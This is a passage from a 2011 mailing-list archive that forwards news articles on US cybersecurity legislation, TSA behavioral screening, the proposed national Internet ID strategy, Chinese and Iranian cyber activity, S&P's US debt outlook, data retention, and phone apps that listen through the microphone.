and knockoff goods. The search engine is dragging its feet in helping tackle the problem, members of the House intellectual property subcommittee said at the hearing. This article first appeared on POLITICO Pro at 8:59 a.m. on April 14, 2011. From rforno at infowarrior.org Fri Apr 15 17:37:55 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 15 Apr 2011 18:37:55 -0400 Subject: [Infowarrior] - WH draft bill expands DHS cyber responsibilities Message-ID: <4841BE68-A247-4075-BC22-729014051F8C@infowarrior.org> White House draft bill expands DHS cyber responsibilities April 15, 2011 By Jason Miller Executive Editor Federal News Radio http://federalnewsradio.com/index.php?nid=35&sid=2345684 Under a White House plan, the Homeland Security Department will have far-reaching oversight over all civilian agency computer networks. The proposal would codify much of the administration's memo from July 2010 expanding DHS's cyber responsibilities for civilian networks. The White House, however, is taking those responsibilities further, according to a source familiar with the document. The administration drafted a legislative proposal to give DHS many, if not all, of the same authorities for the .gov networks that the Defense Department has for the .mil networks. Federal News Radio recently viewed a draft copy of the legislative proposal. "I have to question why the Executive branch is writing legislation," said the source, who requested anonymity because they were not authorized to talk about it. "This is not a proposal or white paper like the White House usually sends to Capitol Hill. This is the actual legislation." The source said the 100-page document is going through interagency review. DHS sent the document around to agencies late last Friday and asked for comments by Monday. The source said few agencies had time to take a hard look at the document, especially in light of the possible government shutdown. Sources on Capitol Hill and in government confirmed the White House is working on such a proposal. A DHS spokesman said the agency doesn't comment on pending legislation. Incorporates Senate cyber bill, OMB memo The bill would bring together legislative proposals by Sens. Joseph Lieberman (I-Conn.), Susan Collins (R-Maine) and Tom Carper (D-Del.), as well as Office of Management and Budget's memo from July 2010 expanding DHS's authorities. "The cybersecurity legislation being developed in Congress is a large, complex bill with wide-ranging implications, and several Senate committees are involved in its drafting," said committee spokeswoman Leslie Phillips. "The two primary committees of jurisdiction - Homeland Security and Commerce - completed the bulk of their work last August and ironed out several remaining differences by the end of March this year. However, other committees and the White House are critical to the completion of this bill." In a statement, Lieberman said, "We have been waiting with great anticipation for the White House to weigh in on the best way to protect the American people from catastrophic cyber attacks. If the White House is on the same path we're on, the Senate should be able to approve comprehensive cybersecurity legislation this year." Collins said in a floor statement in February about the new bill that the legislation would make DHS a strong partner in the process of securing agency networks, but the White House will be the central point for all cybersecurity across the government. The Lieberman, Collins and Carper bill would establish a National Center for Cybersecurity and Communications in DHS. "It would be located within the Department of Homeland Security to elevate and strengthen the Department's cyber security capabilities and authorities," Collins said. "This Center also would be led by a Senate-confirmed director. The Cyber Center, anchored at DHS, will close the coordination gaps that currently exist in our disjointed federal cyber security efforts. For day-to-day operations, the Center would use the resources of DHS, and the Center Director would report directly to the Secretary of Homeland Security. On interagency matters related to the security of federal networks, the director would regularly advise the President - a relationship similar to the director of the National Counterterrorism Center on counterterrorism matters or the chairman of the Joint Chiefs of Staff on military issues. These dual relationships would give the director sufficient rank and stature to interact effectively with the heads of other departments and agencies, and with the private sector." A second source said the proposal also gives DHS much of the Federal Information Security Management Act (FISMA) authorities that currently fall under OMB, such as policy development and issuance, and the creation of performance measures, guidelines and training. The first source said the proposal actually goes further than previous bills and memos. The source said the DHS secretary would have broad authorities and oversight responsibilities similar to what Gen. Keith Alexander has with DoD's U.S. Cyber Command. DHS oversees all civilian cybersecurity The bill authorizes DHS, in coordination with OMB, "to exercise primary responsibility of operational aspects of IT security in agencies" that is consistent with OMB guidance. The DHS secretary "shall oversee agency security implementations, the implementation of policies" and compliance with policy and regulatory requirements. DHS and OMB also would issue "compulsory and binding directives" oversee the implementation of agency information security policies, review agency information security programs, designate a person to receive information on security threats and issues and address incident response. The bill exempts national security and DoD systems from DHS oversight. Under one version of comprehensive cybersecurity legislation, DHS would get four senior vice president level executives for cybersecurity. But this latest proposal from the White House would change that by adopting DoD's hiring authorities. The first source said DHS could make direct hires, set compensation rates as necessary and pay additional benefits and incentives. DHS also would establish a scholarship program for employees to pursue college or advanced degrees in cybersecurity, and it reactivates the industry-to-government and government-to-industry exchange program for cybersecurity professionals. The authorities in the bill are similar to those the Office of Personnel Management approved for DHS in September 2009. DHS received Schedule A authorities for cyber positions. The proposal also would give DHS a significant role in cyber-related procurements. The source said the language in the bill is "vague" about what kind of role DHS will play. Google provision around data centers? Additionally, the source said there is a provision toward the end of the document that could have far-reaching effects. The provision states: "Prohibition, no law, rule, regulation or order or other administrative action of any state or political subdivision shall require a business entity to house a data center in such state or political subdivision there of as a condition to certify, licensure or approval in relating to operation of such entity." The source said the provision means the government can't stop a company from doing business in a state, but if the state is doing a procurement, they can't tell the business to locate a data center in their state. The provision also defines what a data center is and says the language will "promote efficiency and innovation" The source called it the "Google provision" since the search engine giant hosts its data in centers around the world. There are some exceptions, such as, if the data center is being used only for sate business and not shared among users across business sectors. In addition to federal cybersecurity, the bill goes into details about cyber crime and critical infrastructure security. For instance under cyber crime, the proposal would expand the Computer Fraud and Abuse Act to include a series of criminal offensives for cyber attacks and confidentiality abuses. It also would expand the Racketeer Influenced and Corrupt Organizations (RICO) Act to establish criminal penalties for cyber crime. Under critical infrastructure protection, the bill lets the DHS secretary decide what is critical infrastructure, assess audit systems for cyber resilience and create an industry of third-party accreditors and evaluators to assess private sector owners and operators systems for meeting cybersecurity requirements. The proposal also requires the development of voluntary consensus standards by industry, academic and government experts for each sector. The bill states that owners and operators of critical infrastructure shall develop cybersecurity measures, and a senior accountable official must sign and attest to their implementation. The bill adds that form must remain on file and available for review, inspection and evaluations by third-party evaluators. The bill continues to move through interagency review and there is no stated timetable for moving it to the Hill for formal consideration, sources say. This story is part of Federal News Radio's daily Cybersecurity Update brought to you by Tripwire. For more cybersecurity news, click here. From rforno at infowarrior.org Fri Apr 15 17:39:45 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 15 Apr 2011 18:39:45 -0400 Subject: [Infowarrior] - TSA looks at people who complain about ... TSA Message-ID: <65937C80-DDDB-4885-B66F-D2F39066F236@infowarrior.org> TSA security looks at people who complain about ... TSA security By Mike M. Ahlers and Jeanne Meserve, CNN April 15, 2011 12:57 p.m. EDT http://www.cnn.com/2011/TRAVEL/04/15/tsa.screeners.complain/ Washington (CNN) -- Don't like the way airport screeners are doing their job? You might not want to complain too much while standing in line. Arrogant complaining about airport security is one indicator Transportation Security Administration officers consider when looking for possible criminals and terrorists, CNN has learned exclusively. And, when combined with other behavioral indicators, it could result in a traveler facing additional scrutiny. CNN has obtained a list of roughly 70 "behavioral indicators" that TSA behavior detection officers use to identify potentially "high risk" passengers at the nation's airports. Many of the indicators, as characterized in open government reports, are behaviors and appearances that may be indicative of stress, fear or deception. None of them, as the TSA has long said, refer to or suggest race, religion or ethnicity. But one addresses passengers' attitudes towards security, and how they express those attitudes. It reads: "Very arrogant and expresses contempt against airport passenger procedures." TSA officials declined to comment on the list of indicators, but said that no single indicator, taken by itself, is ever used to identify travelers as potentially high-risk passengers. Travelers must exhibit several indicators before behavior detection officers steer them to more thorough screening. But a civil liberties organization said the list should not include behavior relating to the expression of opinions, even arrogant expressions of opinion. "Expressing your contempt about airport procedures -- that's a First Amendment-protected right," said Michael German, a former FBI agent who now works as legal counsel for the American Civil Liberties Union. "We all have the right to express our views, and particularly in a situation where the government is demanding the ability to search you." "It's circular reasoning where, you know, I'm going to ask someone to surrender their rights; if they refuse, that's evidence that I need to take their rights away from them. And it's simply inappropriate," he said. The TSA says its security programs are informed by real-world situations and intelligence. Indeed, the immigration agent who refused to let the alleged "20th hijacker" into the United States in 2001 later testified that the man's arrogant behavior contributed to his suspicions. Agent Jose Melendez-Perez told the 9/11 commission that Mohammed al-Qahtani "became visibly upset" and arrogantly pointed his finger in the agent's face when asked why he did not have an airline ticket for a return flight. But some experts say terrorists are much more likely to avoid confrontations with authorities, saying an al Qaeda training manual instructs members to blend in. "I think the idea that they would try to draw attention to themselves by being arrogant at airport security, it fails the common sense test," said CNN National Security Analyst Peter Bergen. "And it also fails what we know about their behaviors in the past." The 9/11 commission's report says that "none of the checkpoint supervisors (on September 11th) recalled the (successful) hijackers or reported anything suspicious regarding their screening." But, it says, an airline ticket agent that checked in hijacker Mohammed Atta says Atta "reacted negatively when informed in Portland (Maine) that he would have to check in again in Boston." Atta "clenched his jaw and said ... with some irritation, 'They told me one step check-in,'" he recalled. The ticket agent recommended the United States hire "behavior profilers ... the way they do overseas," the report says. Rafi Ron, former director of security at Tel Aviv's Ben Gurion International Airport, said an arrogant complaint about security is a legitimate factor to consider. But officials also should be suspicious of effusive praise, he said. "The other end of the spectrum is almost as bad, although it is maybe less offensive," he said. The TSA is expanding the behavior detection program, formally known as SPOT, for Screening Passengers by Observation Technique. Currently, some 3,000 uniformed behavior detection officers are deployed at about 175 airports. President Obama is calling for an additional 175 such officers in his 2012 budget proposal, and the TSA is expected to spend a total of $1.2 billion on the program over the next five years. In recent years, the TSA has also expanded the scope of the program. Originally intended to look only for suspected terrorists, the program now also seeks to ferret out possible criminals in airports. Many details of the program are publicly available. According to a Government Accountability Office report, uniformed behavior detection officers typically work in two-person teams at airport checkpoint lines, looking for behaviors that are on the SPOT checklist, each of which is assigned a numerical value. The officers sometimes initiate casual conversations with passengers, particularly if a passenger is exhibiting behaviors on the SPOT checklist. In most instances, the Accountability Office said, the conversation resolves the suspicion. But if both behavior detection officers agree that observed indicators exceed a predetermined numerical threshold, the person is referred to additional screening, which can involve more questioning and physical searches of a person or property. If the person's behavior escalates, accumulating more points based on the SPOT checklist, the officers can refer the person to local law enforcement for investigation. After the law enforcement investigation, the TSA officials determine whether to allow the passenger to board the flight. The Department of Homeland Security says the program is successful, telling Congress last week that, in a recent test comparing behavior detection officers to random screening procedures, the officers were 50 times more likely to refer people they checked to local law enforcement, and about 4.5 times as likely to identify people with prohibited items or fraudulent documents. Taken together, such officers are nine times more likely to identify "high risk" passengers than random screening, the department said. "SPOT identifies high-risk travelers at a significantly higher rate then random screening," Larry Willis of the department's Science and Technology Directorate testified. But one member of the study's Technical Advisory Committee said the study did not establish the program's scientific validity. "The advisory committee has not been asked to evaluate the overall SPOT program, nor has it been asked to evaluate the validity of indicators used in the program," Philip Rubin testified to Congress last week. Advisory committee members were not shown the list of behavioral indicators, he said. "My concern is that if I'm a member of the public and I hear (Willis') testimony, it sounds like the SPOT program has been validated," Rubin told CNN. He said that while large numbers of people were screened, very little criminal activity was detected, and the numbers may not be statistically significant. "The hit rate is so low on this, it could turn out to be a random glitch," he said. The Government Accountability Office also criticized the study, saying TSA's records are incomplete and the study is not designed to answer the big question people have about the program: Does it work? The study "is not designed to fully validate whether behavior detection can be used to reliably identify individuals in an airport environment who pose a security risk," the agency said. Members of Congress also expressed concern about the number of "false positives" -- people flagged for additional screening that resulted in nothing being found. For every person correctly identified as a "high risk" traveler by (the behavior detection officers), 86 were misidentified, Willis said. At random screening, for every person correctly identified, 794 were misidentified. The TSA does not track the number of arrests, convictions or exonerations of people that are referred to law enforcement, he said. The ACLU's German, who has not seen the behavioral indicators list, said he fears the indicators "are being used simply as a proxy for racial profiling or other inappropriate police activities." The number of people arrested at airport checkpoints for immigration violations suggests the behavior detection officers are profiling, he said. Thirty-nine percent of the 1,083 people arrested during the first four and a half years of the program were arrested because they were illegal aliens, according to the Government Accountability Office. Experts agree that the fact that there is an extremely small number of terrorists makes it hard to evaluate the effectiveness of behavioral observation programs. The Accountability Office said it looked at 23 occasions in which 16 individuals -- people later charged with terrorism-related activities -- passed through high-threat airports. None is known to have been identified. But it is not known if the behavior detection officers were working at the time, the agency said. Stephen Lord of the Accountability Office is recommending the TSA study airport videos of those instances. "We believe such recordings could help identify behaviors that may be common among terrorists, or could demonstrate that terrorists do not generally display any identifying behaviors," Lord said. From rforno at infowarrior.org Fri Apr 15 17:42:54 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 15 Apr 2011 18:42:54 -0400 Subject: [Infowarrior] - Obama moves forward with Internet ID plan Message-ID: April 15, 2011 11:18 AM PDT Obama moves forward with Internet ID plan by Declan McCullagh http://news.cnet.com/8301-31921_3-20054342-281.html The Obama administration said today that it's moving ahead with a plan for broad adoption of Internet IDs despite concerns about identity centralization, and hopes to fund pilot projects next year. At an event hosted by the U.S. Chamber of Commerce in Washington, D.C., administration officials downplayed privacy and civil liberties concerns about their proposal, which they said would be led by the private sector and not be required for Americans who use the Internet. There's "no reliable way to verify identity online" at the moment, Commerce Secretary Gary Locke said, citing the rising tide of security threats including malware and identity theft that have grown increasingly prevalent over the last few years. "Passwords just won't cut it here." A 55-page document (PDF) released by the White House today adds a few more details to the proposal, which still remains mostly hazy and inchoate. It offers examples of what the White House views as an "identity ecosystem," including obtaining a digital ID from an Internet service provider that could be used to view your personal health information, or obtaining an ID linked to your cell phone that would let you log into IRS.gov to view payments and file taxes. The idea is to have multiple identity providers that are part of the same system. Administration officials plan to convene a series of workshops between June and September of this year that would bring together companies and advocacy groups and move closer to an actual specification for what's being called the National Strategy for Trusted Identities in Cyberspace, or NSTIC. Left unsaid was that the series of workshops, which will be open to the public, will give the proposal's backers a chance to downplay concerns that it could become the virtual equivalent of a national ID card. During his speech, Locke lashed out at the "conspiracy theory set" who have criticized the proposal. A column in NetworkWorld.com, for instance, called NSTIC a "great example of rampant, over-reaching, ignorant, and ill-conceived political foolishness." "A top-down strategy for online identity is unlikely to work," Jim Harper, director of information studies at the Cato Institute, said today. "People will not participate in a government-corporate identity project that deviates from their demand for control of identity information, which is an essential part of privacy protection, autonomy, and liberty." The Commerce Department's National Telecommunications and Information Administration created a YouTube video (above) to reassure Americans that "there is no central database tracking your actions." An FAQ repeats the message. It's enlisted allies to spread the message, including the Center for Democracy and Technology's Leslie Harris, who wrote in a post on commerce.gov that NSTIC is "not a national ID," but instead represents "a call for leadership and innovation from private companies." One intriguing feature of today's description of NSTIC released by the White House is that it appears to build on a joint Microsoft-IBM project called Attribute-Based Credentials. (See CNET's previous coverage.) The idea is to use encryption technology to let people disclose less about themselves--ideally, the minimum necessary to complete a transaction. The NSTIC document gives the example of someone filling a medical prescription online: "The pharmacy is not told (his) birth date or the reason for the prescription. The technology also filters information so that the attribute providers---the authoritative sources of the age and prescription information---do not know what pharmacy (is being used)." Related links ? A new (old) way to protect privacy: Disclose less ? Obama to hand Commerce Dept. authority over cybersecurity ID The idea of using encryption technology to protect privacy in this way isn't exactly new. The legendary cryptographer David Chaum, the father of digital cash who's now building secure electronic voting systems, developed some of these ideas in the late 1980s. Dutch cryptographer Stefan Brands more fully developed the concept of limited disclosure digital certificates; Microsoft bought his company in 2008, and released the U-Prove specification last year along with a promise not to file patent lawsuits over its use. On the other hand, it would be more convenient for law enforcement (not to mention intelligence agencies) if a more traditional, centralized system were used. Sen. Barbara Mikulski, a Maryland Democrat who also spoke today at the Chamber event, seemed to veer a bit off-message--and instead of touting anonymity, she stressed the importance of aiding law enforcement. Protecting civil liberties is important, Mikulski said. "But the first civil liberty is to be able to have a job, lead a life, and be able to buy what you want in the way we now buy it, which is through credit cards." "We're going to support the FBI," said Mikulski, who heads the Senate subcommittee that oversees the FBI's funding. "We're going to support the growth of the FBI." The Obama administration's record on digital identification and authentication is mixed. During the 2008 presidential campaign, President Obama told CNET that "I do not support the Real ID program." But after being elected, Obama has not called for its repeal and his administration said last month that it's working "very closely with the states to assist with implementation." Another cautionary note comes from a previous public-private partnership that also sought to improve identity-related authentication. The largest company participating in the TSA's registered traveler identification program, Verified Identity Pass' CLEAR, shut down in 2009. Its assets were sold to the highest bidder. Another concern: Although the White House is describing the NSTIC plan as "voluntary," federal agencies could begin to require it for IRS e-filing, applying for Social Security or veterans' benefits, renewing passports online, requesting federal licenses (including ham radio and pilot's licenses), and so on. Then obtaining one of these ID would become all but mandatory for most Americans. "For end-users, online identification has become increasingly cumbersome and complex," says Marc Rotenberg, president of the Electronic Privacy Information Center. "But it remains unclear whether the White House proposal will solve this problem or create new problems. There is the real risk that consolidated identity schemes will lead to 'hyper' identity theft." From rforno at infowarrior.org Sun Apr 17 10:23:03 2011 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 17 Apr 2011 11:23:03 -0400 Subject: [Infowarrior] - PRC: The 1st Technical Reconnaissance Bureau Message-ID: The Mighty 1st Technical Reconnaissance Bureau http://www.strategypage.com/htmw/htiw/articles/20110417.aspx April 17, 2011: Chinese Cyber War units have been plundering foreign government and military online data for over five years now. But thanks to Wikileaks, and several other sources, the identity and location of the main Chinese Cyber War operation is now known. The Chinese Chengdu Province First Technical Reconnaissance Bureau (1st TRB) is a Chinese Army electronic warfare unit located in central China (Chengdu), and is the most frequent source of hacking attacks traced back to their source. The servers used by the 1st TRB came online over five years ago, and are still used. The Chinese government flatly refuses to even discuss the growing pile of evidence regarding operations like the 1st TRB. The 1st TRB is part of the Chinese Army's Third Department, which is responsible for all sorts of electronic eavesdropping. But given the praise showered on the 1st TRB, a lot of valuable data has apparently been brought to Chengdu, and then distributed to the appropriate industrial, diplomatic or military operations. The hacking operation has been so successful, that it has obtained more staff and technical resources. As a result, in the last five years, detected hacking attempts on U.S. government and corporate networks has increased by more than six times. Most of these hacks appear to be coming from China. Not all the hacking is done by 1st TRB personnel. A lot of it appears to be the work of Chinese freelancers, often working for pay, but sometimes just to "serve the motherland." From rforno at infowarrior.org Sun Apr 17 12:30:19 2011 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 17 Apr 2011 13:30:19 -0400 Subject: [Infowarrior] - =?windows-1252?q?Iran_announces_=91halal_Internet?= =?windows-1252?q?=2C=92_new_cyberdefense_study_program?= Message-ID: <98E22EFA-7F17-4021-9C82-F4E8EC22FB68@infowarrior.org> Iran announces ?halal Internet,? new cyberdefense study programs Cyrus Farivar | Featured, Iran 17 Apr 2011 http://internetofelsewhere.com/blog/2011/04/17/iran-announces-halal-internet-and-new-cyberdefense-study-programs/ On Friday, Ali Aghamohammadi, the Ahmadinejad Administration?s head of economic affairs was quoted in IRNA, a state-run news agency that Iran was working on a ?halal Internet.? ?Iran will soon create an internet that conforms to Islamic principles, to improve its communication and trade links with the world,? he said, apparently explaining that the new network would operate in parallel to the regular Internet and would possibly eventually replace the open Internet in Muslim countries in the regions. ?We can describe it as a genuinely ?halal? network aimed at Muslims on a ethical and moral level,? he said. ?The aim of this network is to increase Iran and the Farsi language?s presence in what has become the most important source of international communication.? In other Iranian Internet news, the commander of the Iranian civil defence organisation, Gholam Reza Jalali was also quoted in IRNA on Saturday that Iran believes the United States and Israel were behind the creation of the Stuxnet worm. ?Investigations and studies show that the source of Stuxnet originates from America and the Zionist regime,? he said. In the same IRNA interview, Jalali was also quoted as saying that Iran was creating the ?1390 Program? ? 1390 being the current year in the Persian calendar ? which would add six cyberdefense master?s degree programs and one doctoral program across various Iranian universities. ?The final solution to problems of [cyberdefense and the] formation of Jihad, is to achieve economic self-sufficiency in the production of basic software such as operating systems and software,? he said. From rforno at infowarrior.org Mon Apr 18 08:24:55 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 18 Apr 2011 09:24:55 -0400 Subject: [Infowarrior] - S&P Cuts U.S. Ratings Outlook to Negative Message-ID: (Anyone not knowing this was coming? --- rick) April 18, 2011, 9:19 a.m. EDT S&P Cuts U.S. Ratings Outlook to Negative http://www.marketwatch.com/story/sp-cuts-us-ratings-outlook-to-negative-2011-04-18-91500 WASHINGTON?Standard & Poor's cut its ratings outlook on the U.S. to negative from stable while keeping its Triple-A rating on the world's largest economy. "More than two years after the beginning of the recent crisis, U.S. policymakers have still not agreed on how to reverse recent fiscal deterioration or address longer-term fiscal pressures," said Standard & Poor's credit analyst Nikola G. Swann . U.S. stock futures plunged on the news, with Dow industrial futures falling 167 points. Bond yields rose. Write to Steve Goldstein at steven.goldstein at dowjones.com From rforno at infowarrior.org Mon Apr 18 12:55:00 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 18 Apr 2011 13:55:00 -0400 Subject: [Infowarrior] - Why Listen to S&P on US Debt? Message-ID: <36CA4842-C50F-4A5B-9C35-8584191F2747@infowarrior.org> (Amen, Barry! --- rick) Why Listen to S&P on US Debt? By Barry Ritholtz - April 18th, 2011, 11:10AM http://www.ritholtz.com/blog/2011/04/why-listen-to-sp-on-us-debt/ There is an old Wall Street joke about analysts: ?You don?t need them in a Bull Market, and you don?t want them in a Bear Market.? Which brings me to Standard & Poor?s. They put a ?negative? outlook on the U.S. AAA credit rating, citing rising budget deficits and debt. To which I say ?Who Cares?? Its not that I disagree with their assessment ? I do not ? but I pay it little heed. It was much more important to me as an investor that PIMCO?s Bill Gross was out of Treasuries a month ago (and indeed, is short) than what S&P says. That was all any bond investor needed to know ? no ratings agency necessary. If ever there was an organization more corrupt, incompetent, and less capable of issuing an intelligent analysis on debt than S&P, I am unaware of them. Why do I write this? A huge part of the reason the US is in its awful financial position is due to the fine work of S&P. Consider what Nobel Laurelate Joseph Stiglitz, economics professor at Columbia University in New York observed: ?I view the ratings agencies as one of the key culprits. They were the party that performed that alchemy that converted the securities from F-rated to A-rated. The banks could not have done what they did without the complicity of the ratings agencies.? Hence, the ?negative outlook? of US debt has come about because the inability of Standard & Poor?s to have performed their jobs rating mortgage backed securities. Ultimately, this enabled the entire crisis, financial collapse, enormous budget deficit and now political over the debt ceiling. Of course there is a negative future outlook. Its in large part the work product of S&P and Moody?s. Why we even have Nationally Recognized Statistical Rating Organization (NRSRO) any longer following their payola =driven corruption, their gross incompetency and their inability to discharge their basic duties is beyond my understanding. From rforno at infowarrior.org Mon Apr 18 13:11:02 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 18 Apr 2011 14:11:02 -0400 Subject: [Infowarrior] - Yahoo plans to keep search records for 18 months Message-ID: <23E4D034-C641-43E0-B2FA-E419DB6139A1@infowarrior.org> (Funny, I didn't know anyone used Yahoo for search. --- rick) Yahoo plans to keep search records for 18 months By JOELLE TESSLER, AP Technology Writer ? 1 hr 2 mins ago http://news.yahoo.com/s/ap/20110418/ap_on_hi_te/us_tec_yahoo_data_retention WASHINGTON ? Yahoo plans to extend the amount of time it retains user search records to 18 months from 90 days. The company says it will consider keeping other types of information about its users for longer durations, too. The new data retention policy marks an about-face for Yahoo. In late 2008, the company became the first big Internet search engine to commit to "anonymizing" a wide range of user data after 90 days in most cases. Such data ? including records of Web searches, page views and ad clicks ? are used to personalize Web content and target online advertising. Yahoo anonymizes the data by stripping out portions of users' numeric Internet addresses, altering small tracking files known as "cookies" and deleting other potential personally identifiable information. From rforno at infowarrior.org Mon Apr 18 13:41:03 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 18 Apr 2011 14:41:03 -0400 Subject: [Infowarrior] - Snooping: It's not a crime, it's a feature Message-ID: <81020BB1-F3F0-4B97-A39D-29524F037BA9@infowarrior.org> Snooping: It's not a crime, it's a feature New apps hijack the microphone in your cell phone to listen in on your life Mike Elgan April 16, 2011 (Computerworld) http://www.computerworld.com/s/article/print/9215853/Snooping_It_s_not_a_crime_it_s_a_feature Cellphone users say they want more privacy, and app makers are listening. No, they're not listening to user requests. They're literally listening to the sounds in your office, kitchen, living room and bedroom. A new class of smartphone app has emerged that uses the microphone built into your phone as a covert listening device -- a "bug," in common parlance. But according to app makers, it's not a bug. It's a feature! The apps use ambient sounds to figure out what you're paying attention to. It's the next best thing to reading your mind. Your phone is listening The issue was brought to the world's attention recently on a podcast called This Week in Tech. Host Leo Laporte and his panel shocked listeners by unmasking three popular apps that activate your phone's microphone to collect sound patterns from inside your home, meeting, office or wherever you are. The apps are Color, Shopkick and IntoNow, all of which activate the microphones in users' iPhone or Android devices in order to gather contextual information that provides some benefit to the user. Color uses your iPhone's or Android phone's microphone to detect when people are in the same room. The data on ambient noise is combined with color and lighting information from the camera to figure out who's inside, who's outside, who's in one room, and who's in another, so the app can auto-generate spontaneous temporary social networks of people who are sharing the same experience. Shopkick works on both iPhone and Android devices. One feature of the app is to reward users for simply walking into participating stores, which include Target, Best Buy, Macy's, American Eagle Outfitters, Sports Authority, Crate & Barrel and many others. Users don't have to press any button. Shopkick listens through your cellphone for inaudible sounds generated in the stores by a special device. IntoNow is an iOS app that allows social networking during TV shows. The app listens with your iPhone or iPad to identify what you're watching. The company claims 2.6 million "broadcast airings" (TV shows or segments) in its database. A similar app created for fans of the TV show Grey's Anatomy uses your iPad's microphone to identify exactly where you are in the show, so it can display content relevant to specific scenes. While IntoNow is based on the company's own SoundPrint technology, the Grey's Anatomy app is built on Nielsen's Media-Sync platform. Obviously, the idea that app companies are eavesdropping on private moments creeps everybody out. But all these apps try to get around user revulsion by recording not actual sounds, but sound patterns, which are then uploaded to a server as data and compared with the patterns of other sounds. Color compares sounds between users to figure out which users are listening to the same thing. Shopkick compares sounds to its database of unique inaudible patterns that identify each store. The SoundPrint- and Media-Sync-based apps compare sound patterns to their database of patterns mapped from all known TV shows. Who else is listening? Apps that listen have been around for years. One type of app uses your phone's microphone to identify music. Apps like Shazam and SoundHound can "name that tune" in a few seconds by simply "listening" to whatever song is playing in the room. A class of alarm clock apps uses your phone's microphone to listen to you sleep. One example is the HappyWakeUp app. If you're sleeping like a log, the app avoids waking you. When HappyWakeUp hears you tossing and turning near the scheduled time, it wakes you up with an alarm. Of course, the use of your microphone with these apps is well understood by users, because that's the main purpose of the app. The new apps are often sneakier about it. The vast majority of people who use the Color app, for example, have no idea that their microphones are being activated to gather sounds. Welcome to the future. Coming soon: A lot more apps that listen What you need to know about marketing and advertising is that data is king. Marketers can never get enough, because the more they know about you and your lifestyle, the more effective their marketing and the more valuable and expensive their advertising. That's why marketers love cellphones, which are viewed as universal sensors for conducting highly granular, real-time market research. Of course, lots of apps transmit all kinds of private data back to the app maker. Some send back each phone's Unique Device Identification (UDI), the number assigned to each mobile phone, which can be used to positively identify it. Other apps tell the servers the phone's location. Many apps actually snoop around on your phone, gathering up personal information, such as gender, age and ZIP code, and zapping it back to the company over your phone's data connection. Most app makers disclose much of what they gather, including audio data, but they often do so either on their websites or buried somewhere in the legal mumbo jumbo. It turns out that, thanks to sophisticated pattern-recognition software, harvested sounds from your home, office or environment can be transformed into marketing demographic gold. You should know that any data that can be gathered, will be gathered. Since the new microphone-hijacking apps are still around, we now know that listening in on users is OK. So, what's possible with current technology? By listening in on your phone, capturing "patterns," then sending that data back to servers, marketers can determine the following: ? Your gender, and the gender of people you talk to. ? Your approximate age, and the ages of the people you talk to. ? What time you go to bed, and what time you wake up. ? What you watch on TV and listen to on the radio. ? How much of your time you spend alone, and how much with others. ? Whether you live in a big city or a small town. ? What form of transportation you use to get to work. All this data and more, plus the UDI on your phone, could enable advertising companies to send you very narrowly targeted advertising for products and services that you're likely to want. The future of marketing is contextual. And listening in on your life will enable marketers to deeply understand not only who and where you are, but also what you're paying attention to. How do you feel about cellphone apps listening in on your life? If you'd like to tell me, I'm listening, too. Mike Elgan writes about technology and tech culture. Contact and learn more about Mike at Elgan.com, or subscribe to his free e-mail newsletter, Mike's List. From rforno at infowarrior.org Mon Apr 18 14:24:07 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 18 Apr 2011 15:24:07 -0400 Subject: [Infowarrior] - Secrecy of Cyber Threats Said to Cause Complacency Message-ID: Secrecy of Cyber Threats Said to Cause Complacency April 18th, 2011 by Steven Aftergood http://www.fas.org/blog/secrecy/2011/04/cyber_secrecy.html The American public does not have an accurate sense of the threat posed by attacks in cyberspace because most of the relevant threat information is classified, according to Sen. Sheldon Whitehouse (D-RI), who introduced legislation last week to raise public awareness of cyber security hazards. ?The damage caused by malicious activity in cyberspace is enormous and unrelenting,? Sen. Whitehouse said on April 14. ?Every year, cyber attacks inflict vast damage on our Nation?s consumers, businesses, and government agencies. This constant cyber assault has resulted in the theft of millions of Americans? identities; exfiltration of billions of dollars of intellectual property; loss of countless American jobs; vulnerability of critical infrastructure to sabotage; and intrusions into sensitive government networks.? ?These massive attacks have not received the attention they deserve. Instead, we as a nation remain woefully unaware of the risks that cyber attacks pose to our economy, our national security, and our privacy,? he said. ?This problem is caused in large part by the fact that cyber threat information ordinarily is classified when it is gathered by the government or held as proprietary when collected by a company that has been attacked. As a result, Americans do not have an appropriate sense of the threats that they face as individual Internet users, the damage inflicted on our businesses and the jobs they create, or the scale of the attacks undertaken by foreign agents against American interests.? With Sen. Jon Kyl (R-AZ), Sen. Whitehouse introduced the ?Cyber Security Public Awareness Act? to require government agencies to provide increased public reporting of cyber threat information. ?As of 2011, the level of public awareness of cyber security threats is unacceptably low. Only a tiny portion of relevant cyber security information is released to the public. Information about attacks on Federal Government systems is usually classified. Information about attacks on private systems is ordinarily kept confidential. Sufficient mechanisms do not exist to provide meaningful threat reports to the public in unclassified and anonymized form,? the bill stated. Last year, Sen. Whitehouse chaired a bipartisan Senate Intelligence Committee task force on cyber security. ?The government keeps the damage we are sustaining from cyber attacks secret because it is classified,? he said last November. The private sector keeps the damage they are sustaining from cyber attacks secret so as not to look bad to customers, to regulators, and to investors. The net result of that is that the American public gets left in the dark.? From rforno at infowarrior.org Mon Apr 18 15:22:35 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 18 Apr 2011 16:22:35 -0400 Subject: [Infowarrior] - Judge in Righthaven case has some fun .... Message-ID: <52672F92-8D50-4CFE-ABD3-2F22DC23D9DF@infowarrior.org> Rule #1 in court cases: Don't get the judge angry and CERTAINLY don't suggest that s/he's wrong. Righthaven Tells Judge Handling All Its Colorado Cases That He's Wrong http://www.techdirt.com/articles/20110416/01323713925/righthaven-tells-judge-handling-all-its-colorado-cases-that-hes-wrong.shtml Judge Slams Righthaven's Legal Tactics, Unseals Document That May Undermine All Righthaven Cases http://www.techdirt.com/articles/20110416/00461913923/judge-slams-righthavens-legal-tactics-unseals-document-that-may-undermine-all-righthaven-cases.shtml Unsealed Document Reveals 'Sham' Copyright Assignments To Righthaven http://www.techdirt.com/articles/20110416/01084413924/unsealed-document-reveals-sham-copyright-assignments-to-righthaven.shtml From rforno 